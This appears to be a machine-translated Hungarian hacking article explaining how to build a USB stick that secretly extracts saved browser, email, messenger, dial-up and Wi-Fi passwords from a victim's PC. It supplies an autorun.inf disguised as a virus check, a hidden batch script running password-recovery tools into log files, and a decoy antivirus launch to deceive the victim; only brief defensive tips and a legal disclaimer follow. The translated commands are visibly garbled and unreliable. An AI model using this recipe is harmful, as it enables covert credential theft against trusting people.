Töltse le a jelszó-helyreállítási segédprogramokat, amelyekre szükségünk van:

* Messenpass - Visszaállítja a jelszavakat a legnépszerűbb azonnali üzenetküldő programokhoz: MSN Messenger, Windows Messenger (Windows XP), Windows Live Messenger (Windows XP és Vista), Yahoo Messenger (5.x / 6.x verzió), ICQ Lite 4 .x / 5.x / 2003, AOL Instant Messenger, AIM 6.x, Cél Pro, Trillian, Miranda és Gaim;

* Mail PassView - kivonatok mentett jelszavait mail kliensek: Outlook Express, Microsoft Outlook 2000 (POP3 / SMTP fiókok esetén), Microsoft Outlook 2002/2003/2007, Windows Mail, Incredimail, Eudora, Netscape Mail, a Mozilla Thunderbird Mail Group INGYENES, És webalapú e-mail fiókok;

* IE Passview - Megjeleníti a "szamár" által mentett jelszavakat és jelszavakat;

* Chromompass - Megjeleníti a Google Chrom Browser által mentett jelszavakat és jelszavakat;

* Passwordfox - A Firefox által mentett összes jelszót kapja;

* Védett tároló passview - Visszaállítja a védett tárolóban tárolt összes jelszót;

* Dialupass - húzza az összes dialup / vpn jelszavakat;

* Hálózati jelszó-helyreállítás - Jelszavak megjelenítése, amelyet egy labdát használ a helyi hálózaton, valamint a jelszavak .NET Passport / Messenger fiók;

* PstPassword - A jelszavak kivonása az Outlook személyes mappájából - .pst;

* Vezeték nélküli könyv - Visszaállítja az összes vezeték nélküli hálózati kulcsot (WEP / WPA), amelyet a számítógépen tárol.

Van egy operapapsview segédprogram is, de még nem támogatja a parancssorot. Ezért nem szerepel a készletünkben.
Minden segédprogramot lehet venni.

Rejtett induló () segédprogramra is szükségünk van.

Letöltés a segédprogramok álruhájába is. A "Tõrena" jelszó működését futtatjuk. És csak az ő munkája látni fogja az áldozatot a képernyőn.

Flash meghajtót készítünk.

1. Hozzon létre két mappát a FlashKA-n:
flashka: \\ prog \\ t
flashka: \\ prog \\ log \\

2. A Flashka mappában: \\ PROG \\ POUD ALL ERIMSIONS - Utilities, Hstart.exe, Kk.exe

3. A Flash meghajtó gyökerében az Autorun.inf létrehozása a következő tartalommal:


nyitott \u003d prog / hstart / noconsole "induló.bat"
Akció \u003d Ellenőrizze a számítógépet vírusokhoz


Itt az Action egy gomb, amely a Flash meghajtó csatlakoztatásakor megjelenik az Action Selection ablakban, és a nyitott parancs, amelyet a művelet kiválasztásakor végrehajtani szeretne. Ez a parancs magában foglalja a Bat Nick elindítását egy rejtett üzemmódban a Rejtett START segédprogram segítségével.

4. Hozzon létre egy batnick elindítást.bat:

visszhangoz
echo% Computername% \\% felhasználónév% BTE %% idő% \u003e\u003e PROG / LOG / _LOG.TXTX
indítsa el a PROG / CHROMEPASS.EXE / STEXT PROG / LOG /% COMPUTERAME% _CHROM.TXT
indítsa el a prog / dialupass.exe / Statch PROG / log /% Computername% _dialupass.txt
sTART PROG / IEPV.EXE / STEATK PROG / LOG /% COMPUMERNAME% _IEPV.TXT
indítsa el a PROG / mailPv.exe / Statch PROG / log /% Computername% _mailpv.txt
indítsa el a PROG / MSPASS.EXE / Statch PROG / log /% Computername% _mspass.txt
start PROG / NETPASS.EXE / STEATK PROG / LOG / LOG /% COMPUMERNAME% _NETSPASS.TXT
indítsa el a PROG / PSPV.EXE / STEXT PROG / LOG / COMPUMERNAME% _SPV.TXT
indítsa el a prog / pstpassword.exe / Statch PROG / log /% Computername% _pstpassword.txt
indítsa el a Prog / WirelessKeyView.exe / Statch PROG / log / log /% Computername% _wirelebleview.txtx

Ha nem létezik "% programfájlok% \\ Mozilla Firefox \\" goto vége
indítsa el a PROG / PASSPORTFOX.EXE / STEATK PROG / LOG / LOG /% COMPUMERNAME% _PASSWARDFOX.TXTX
: Vége.
indítsa el a prog / kk.exe-t

Tekintsük a Batnik csapatát részletesebben:

echo off - tiltja a kimenetet a CMD végrehajtási ablakához

echo% Computername% \\% Felhasználónév% BTE %% idő% \u003e\u003e PROG / LOG / _LOG.TXT - a PROG / LOG / _LOG.TXT fájlhoz rögzítse a számítógép nevét, a felhasználónevet, a dátumot és az időt

sTART PROG / CHROMEPASS.EXE / STEXT PROG / LOG / COMPUMERNAME% _CHROM.TXT - futtassa a ChromePass.exe segédprogramot, amely a PROG / LOG fájl / object_chrom.txt_name_chrom.txt

Hasonlóképpen a többi segédprogramhoz. Az egyetlen jegyzet a passwordfox.exe elindítása előtt ellenőrizze, hogy az FF általában az áldozat számítógépére kerüljön. Csak ha az FF nincs telepítve, akkor a PasswordFox.exe segédprogram hibaüzenetet ad ki.

indítsa el a PROG / KK.EXE-t - A cselekedeteinket egy igazi segédprogram elindításával álcázzuk a WORM NET-WORM.WIN32.KIDO-t a Kaspersky Labtól

Minden - Flashka készen áll. Most a támadó elég csak csatlakozni egy flash meghajtót az áldozat számítógépén, és válassza ki a „Check a Comp-vírusok”, hogy úgy tűnik, hogy húzza ki az összes mentett jelszót a számítógépen. Indokolás A "vírusellenőrzés" elindításának szükségességének elég egyszerű, különösen akkor, ha az áldozat bízik benned.

Hogyan kell kezelni?

1. Ne mentse meg a jelszavakat - Jobb, ha néhány jelszót vagy ewallet típusú programot használ.

3. A normál víruskereső rendelkezésre állása szükségszerűen! Bár csak több ilyen segédprogramot kapsz.

A cikk írásának oka a "Hacker" folyóiratban szereplő megjegyzés volt.

Ez a cikk kizárólag tájékoztató jellegű.
Célja az adatok védelme a támadóból.
Ki tudja, hogy fegyveres!

A többi jelszó lopása a művészet 1. részében büntetőjogi felelősséget jelent. 272. a "jogosulatlan hozzáférés a számítógépes információhoz", és azzal fenyeget igazibörtönben!